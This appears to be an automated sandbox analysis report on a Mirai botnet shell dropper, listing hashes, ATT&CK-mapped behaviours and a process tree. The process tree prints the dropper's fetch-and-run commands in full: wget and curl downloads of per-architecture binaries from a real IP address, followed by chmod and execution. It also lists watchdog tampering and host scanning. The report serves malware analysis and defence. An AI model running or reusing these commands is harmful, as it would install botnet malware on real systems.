Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
08/03/2025, 08:41
Static task
static1
Behavioral task
behavioral1
Sample
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh
-
Size
1KB
-
MD5
c46ce91068e77aa58bd2127bec2ee6c3
-
SHA1
fced6e9a98cb1fd8b568f7698dbf1b4e1e4231d5
-
SHA256
6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a
-
SHA512
ace2a1517ff4dceb812a495e8f5d5a4bbec6825964ffca84b076f57610ed09232b3ad76e995fd83ba121d4a36f82acb0136f27da8d4fc272bd083ac1d8e3e7e9
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
Contacts a large (157428) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 713 chmod 757 chmod 772 chmod 778 chmod 679 chmod 699 chmod 738 chmod 764 chmod 785 chmod 689 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/ssh 680 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 690 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 701 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 715 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 739 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 758 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 766 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 773 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 779 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh /tmp/ssh 787 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog ssh File opened for modification /dev/misc/watchdog ssh -
Renames itself 1 IoCs
pid Process 739 ssh -
Unexpected DNS network traffic destination 6 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.158.108.203 Destination IP 152.53.15.127 Destination IP 152.53.15.127 Destination IP 152.53.15.127 Destination IP 152.53.15.127 Destination IP 152.53.15.127 -
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp ssh -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 64 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
description ioc Process File opened for reading /proc/841/maps ssh File opened for reading /proc/764/maps ssh File opened for reading /proc/766/maps ssh File opened for reading /proc/806/maps ssh File opened for reading /proc/831/maps ssh File opened for reading /proc/832/maps ssh File opened for reading /proc/769/maps ssh File opened for reading /proc/798/maps ssh File opened for reading /proc/820/maps ssh File opened for reading /proc/777/maps ssh File opened for reading /proc/753/maps ssh File opened for reading /proc/761/maps ssh File opened for reading /proc/805/maps ssh File opened for reading /proc/827/maps ssh File opened for reading /proc/828/maps ssh File opened for reading /proc/835/maps ssh File opened for reading /proc/804/maps ssh File opened for reading /proc/779/maps ssh File opened for reading /proc/759/maps ssh File opened for reading /proc/765/maps ssh File opened for reading /proc/767/maps ssh File opened for reading /proc/772/maps ssh File opened for reading /proc/780/maps ssh File opened for reading /proc/781/maps ssh File opened for reading /proc/800/maps ssh File opened for reading /proc/760/maps ssh File opened for reading /proc/762/maps ssh File opened for reading /proc/763/maps ssh File opened for reading /proc/776/maps ssh File opened for reading /proc/794/maps ssh File opened for reading /proc/812/maps ssh File opened for reading /proc/814/maps ssh File opened for reading /proc/796/maps ssh File opened for reading /proc/801/maps ssh File opened for reading /proc/821/maps ssh File opened for reading /proc/824/maps ssh File opened for reading /proc/842/maps ssh File opened for reading /proc/757/maps ssh File opened for reading /proc/768/maps ssh File opened for reading /proc/771/maps ssh File opened for reading /proc/797/maps ssh File opened for reading /proc/807/maps ssh File opened for reading /proc/810/maps ssh File opened for reading /proc/837/maps ssh File opened for reading /proc/752/maps ssh File opened for reading /proc/775/maps ssh File opened for reading /proc/817/maps ssh File opened for reading /proc/838/maps ssh File opened for reading /proc/840/maps ssh File opened for reading /proc/843/maps ssh File opened for reading /proc/758/maps ssh File opened for reading /proc/782/maps ssh File opened for reading /proc/784/maps ssh File opened for reading /proc/788/maps ssh File opened for reading /proc/813/maps ssh File opened for reading /proc/816/maps ssh File opened for reading /proc/833/maps ssh File opened for reading /proc/836/maps ssh File opened for reading /proc/783/maps ssh File opened for reading /proc/786/maps ssh File opened for reading /proc/790/maps ssh File opened for reading /proc/795/maps ssh File opened for reading /proc/818/maps ssh File opened for reading /proc/839/maps ssh -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself netns 739 ssh -
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp ssh -
description ioc Process File opened for reading /proc/809/cmdline ssh File opened for reading /proc/214/status ssh File opened for reading /proc/297/status ssh File opened for reading /proc/650/status ssh File opened for reading /proc/772/cmdline ssh File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/75/comm ssh File opened for reading /proc/661/comm ssh File opened for reading /proc/835/cmdline ssh File opened for reading /proc/19/comm ssh File opened for reading /proc/29/comm ssh File opened for reading /proc/41/comm ssh File opened for reading /proc/108/comm ssh File opened for reading /proc/139/comm ssh File opened for reading /proc/270/comm ssh File opened for reading /proc/282/comm ssh File opened for reading /proc/766/cmdline ssh File opened for reading /proc/2/comm ssh File opened for reading /proc/7/comm ssh File opened for reading /proc/131/comm ssh File opened for reading /proc/403/comm ssh File opened for reading /proc/283/status ssh File opened for reading /proc/389/status ssh File opened for reading /proc/735/status ssh File opened for reading /proc/786/cmdline ssh File opened for reading /proc/165/status ssh File opened for reading /proc/604/status ssh File opened for reading /proc/832/cmdline ssh File opened for reading /proc/833/cmdline ssh File opened for reading /proc/840/cmdline ssh File opened for reading /proc/842/cmdline ssh File opened for reading /proc/843/cmdline ssh File opened for reading /proc/13/comm ssh File opened for reading /proc/21/comm ssh File opened for reading /proc/214/comm ssh File opened for reading /proc/283/comm ssh File opened for reading /proc/752/cmdline ssh File opened for reading /proc/767/cmdline ssh File opened for reading /proc/798/cmdline ssh File opened for reading /proc/806/cmdline ssh File opened for reading /proc/18/comm ssh File opened for reading /proc/24/comm ssh File opened for reading /proc/389/comm ssh File opened for reading /proc/267/status ssh File opened for reading /proc/776/cmdline ssh File opened for reading /proc/792/cmdline ssh File opened for reading /proc/810/cmdline ssh File opened for reading /proc/815/cmdline ssh File opened for reading /proc/self/auxv curl File opened for reading /proc/42/comm ssh File opened for reading /proc/311/comm ssh File opened for reading /proc/282/status ssh File opened for reading /proc/267/comm ssh File opened for reading /proc/650/comm ssh File opened for reading /proc/754/cmdline ssh File opened for reading /proc/760/cmdline ssh File opened for reading /proc/765/cmdline ssh File opened for reading /proc/774/cmdline ssh File opened for reading /proc/789/cmdline ssh File opened for reading /proc/805/cmdline ssh File opened for reading /proc/761/cmdline ssh File opened for reading /proc/737/comm ssh File opened for reading /proc/131/status ssh File opened for reading /proc/764/cmdline ssh -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 683 wget 687 curl 688 cat -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jklarm6 wget File opened for modification /tmp/jklx86 wget File opened for modification /tmp/jklx86 curl File opened for modification /tmp/jklmpsl wget File opened for modification /tmp/jklmpsl curl File opened for modification /tmp/jklarm5 wget File opened for modification /tmp/ssh 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh File opened for modification /tmp/jklmips wget File opened for modification /tmp/jklmips curl File opened for modification /tmp/jklarm4 curl File opened for modification /tmp/jklarm5 curl
Processes
-
/tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh/tmp/6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:650 -
/usr/bin/wgetwget http://176.65.134.5/jklx862⤵
- Writes file to tmp directory
PID:653
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklx862⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:667
-
-
/bin/catcat jklx862⤵PID:677
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:679
-
-
/tmp/ssh./ssh ssh2⤵PID:680
-
-
/usr/bin/wgetwget http://176.65.134.5/jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:683
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklmips2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:687
-
-
/bin/catcat jklmips2⤵
- System Network Configuration Discovery
PID:688
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklmips jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/ssh./ssh ssh2⤵PID:690
-
-
/usr/bin/wgetwget http://176.65.134.5/jklmpsl2⤵
- Writes file to tmp directory
PID:692
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklmpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:693
-
-
/bin/catcat jklmpsl2⤵PID:698
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:699
-
-
/tmp/ssh./ssh ssh2⤵PID:701
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm42⤵PID:704
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm42⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:707
-
-
/bin/catcat jklarm42⤵PID:712
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/ssh./ssh ssh2⤵PID:715
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm52⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:724
-
-
/bin/catcat jklarm52⤵PID:736
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/ssh./ssh ssh2⤵
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:739
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm62⤵
- Writes file to tmp directory
PID:741
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm62⤵PID:754
-
-
/bin/catcat jklarm62⤵PID:756
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/ssh./ssh ssh2⤵PID:758
-
-
/usr/bin/wgetwget http://176.65.134.5/jklarm72⤵PID:759
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklarm72⤵PID:761
-
-
/bin/catcat jklarm72⤵PID:763
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:764
-
-
/tmp/ssh./ssh ssh2⤵PID:766
-
-
/usr/bin/wgetwget http://176.65.134.5/jklppc2⤵PID:768
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklppc2⤵PID:769
-
-
/bin/catcat jklppc2⤵PID:770
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/ssh./ssh ssh2⤵PID:773
-
-
/usr/bin/wgetwget http://176.65.134.5/jklm68k2⤵PID:775
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklm68k2⤵PID:776
-
-
/bin/catcat jklm68k2⤵PID:777
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:778
-
-
/tmp/ssh./ssh ssh2⤵PID:779
-
-
/usr/bin/wgetwget http://176.65.134.5/jklsh42⤵PID:782
-
-
/usr/bin/curlcurl -O http://176.65.134.5/jklsh42⤵PID:783
-
-
/bin/catcat jklsh42⤵PID:784
-
-
/bin/chmodchmod +x 6dd36ae06f8ade5299fdb81d072d735d17d15dd4447ab7d1b2b71bf66e0b2b1a.sh jklarm4 jklarm5 jklarm6 jklmips jklmpsl jklx86 ssh systemd-private-0b16319dd34941349e3328a319fdfa60-systemd-timedated.service-m6Lurb2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/ssh./ssh ssh2⤵PID:787
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
205B
MD5fccd0deca96f1630531d355bdb90afae
SHA17b66856c4727953f5c23e898f574fd40bb3d3e33
SHA25659be92959718afe8ed8ffe7009ae6530344385f67eb72791e8e37f52643cc27b
SHA512cf80d05129a7c4a5ec44d167f1e6fe22a104238502456122d3aa72b711d92d008e016bd898ea23d79e28d8a1398b1a1d365db0b80d799cc74c46f9f169643b48
-
Filesize
55KB
MD513646cedba2b07cac40f1722c5ef9bb1
SHA132ed76ad7e47f7919f7c8909321645cdcfeabe8b
SHA256e2f8212e25b5c981e0be92428f013b289c4e2af6198d8414ed91c343ee1987df
SHA512ce7bc090d5266283748f16be2b434a85a43ed5dff513d762653afc365872a360611fbd0dbfbce0628794d26e3a1a7a0a319c5039b74f74db7996acf5a864ed87
-
Filesize
65KB
MD550bdc79e8119ec3deef4549fe78f959f
SHA1b3898231d6b7d044566190bf2cbd04b1b20b7540
SHA256cfee0df1ce4a388193fe3dd0dab48f4db9da05f67f7ccf0ba35fc8fcee38d397
SHA512acb4a121ea03208cb12501aa332e4987841540a95703d7dac292fc766ed2b0b05e17343484c7c4a7d8c01d5952ea05b02964e72bf107f5fe0ffe51522f01875b
-
Filesize
74KB
MD5531a60e53317c7bf134e5c6e57fc4939
SHA16069b3cb94084ec8bfad12f20a7fc992835e329d
SHA2569c8fa144a9688475d367bf19f455fa2efcede7219a41cf77484cabe788e17fe9
SHA512f19ca0527fb858aff4da9f864f1fad8433cc229b8ffabec4fd559a3af4a3fe3d71213a913067a6fea4314b75881ebbe5a8d24408cd8199a3ed54b15725c7505e
-
Filesize
74KB
MD5d0667fe1aa667917ae32b2844024eba7
SHA16a4c65c673dd99d8c291aa343beb35f345c35def
SHA2560d41d41efa67611f4721c465f81060f1d4c096eda88b72c0db43f104329afcb6
SHA5129ff84ed51e53c77d228cd54fab728335c2d658006667c46db1da04c70e97444d47bf5ac6f87e4e4d812430bcca3c44e3ce186d1b604443b6de10bf5367699908
-
Filesize
49KB
MD5ecd1b914d0248a8174d1f5ef567e2227
SHA1c5ba0731a7b3236db4b8443b6be4f2f07d5ed6e5
SHA256adc70485dbae6ab79f9083ff5f96da2fece8b5922f0f5d0757d1c366285bfab6
SHA5129e25c305fa81ce9c4f715d6bc746fae810bc255d7e3d10017242864c4c04923644e86fce42b16c0638a06eb44aa8abec2681d944670dd22d69ac4d0cebbe979f